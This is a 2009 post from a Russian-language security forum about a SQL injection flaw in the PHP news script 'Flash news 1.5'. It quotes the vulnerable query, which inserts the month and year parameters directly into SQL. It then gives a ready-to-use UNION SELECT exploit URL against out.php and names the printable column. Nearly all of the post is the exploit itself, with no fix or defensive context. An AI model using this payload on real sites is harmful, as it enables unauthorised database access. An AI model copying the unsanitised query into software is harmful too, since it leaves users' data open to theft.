HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу SQL-inj Flash news 1.5
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-inj Flash news 1.5
  #1  
Старый 02.09.2009, 18:48
FriLL
Познающий
Регистрация: 14.09.2008
Сообщений: 30
Провел на форуме:
117615

Репутация: 21
По умолчанию SQL-inj Flash news 1.5
Уязвимый код

PHP код:
if((isset($month))&&(isset($year)))
    {   //Выбираем из базы по месяцам
        $mysql="SELECT * FROM $tablename WHERE ((month=$month) AND (year=$year)) ORDER BY date DESC"
expl
out.php?month=09&year=1))-1+union+select+1,2,3,4,5,6+--+

6 поле принтабельное
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ